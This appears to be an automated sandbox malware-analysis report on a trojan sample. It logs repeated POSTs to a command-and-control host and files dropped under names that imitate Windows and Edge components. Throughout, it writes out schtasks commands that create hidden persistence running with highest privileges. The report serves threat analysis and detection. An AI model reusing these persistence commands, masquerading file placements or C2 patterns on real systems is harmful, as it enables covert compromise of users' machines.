                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: unknown
                              UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic
                              DNS traffic detected: DNS query: 977255cm.nyashkoon.in
                              Source: unknown
                              HTTP traffic detected: POST /secureWindows.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                              Host: 977255cm.nyashkoon.in
                              Content-Length: 344
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp
                              String found in binary or memory: http://977255cm.nyashkX
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp
                              String found in binary or memory: http://977255cm.nyashkX:t
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp
                              String found in binary or memory: http://977255cm.nyashkoon.in
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp
                              String found in binary or memory: http://977255cm.nyashkoon.in/
                              Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp
                              String found in binary or memory: http://977255cm.nyashkoon.in/secureWindows.php
                              Source: 0JLWNg4Sz1.exe, 00000000.00000002.1703180777.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp
                              String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\ALzNWdSZ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: 0JLWNg4Sz1.exe, 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1713723661.000000001C6B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.0000000002613000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.00000000025C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000035AC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034F2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.0000000003533000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0JLWNg4Sz1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DViaOgnvmAhwCXZ.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DViaOgnvmAhwCXZ.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: smartscreen.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: StartMenuExperienceHost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.evad.winEXE@36/25@1/1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File created: C:\Program Files (x86)\microsoft\Edge\smartscreen.exe
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File created: C:\Users\user\Desktop\ALzNWdSZ.log
Source: C:\Recovery\StartMenuExperienceHost.exe | Mutant created: NULL
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-sKFQIzXKnAf7PnSalSzG
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File created: C:\Users\user\AppData\Local\Temp\aC4Ftn18Tq
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
Source: 0JLWNg4Sz1.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0JLWNg4Sz1.exe | ReversingLabs: Detection: 65%
Source: 0JLWNg4Sz1.exe | Virustotal: Detection: 56%
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | File read: C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown | Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
Source: unknown | Process created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown | Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
Source: unknown | Process created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
Source: unknown | Process created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, ntmarta.dll, wbemcomn.dll, amsi.dll, userenv.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, wbemcomn.dll, winmm.dll, winmmbase.dll, mmdevapi.dll, devobj.dll, ksuser.dll, avrt.dll, audioses.dll, powrprof.dll, umpdc.dll, msacm32.dll, midimap.dll
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
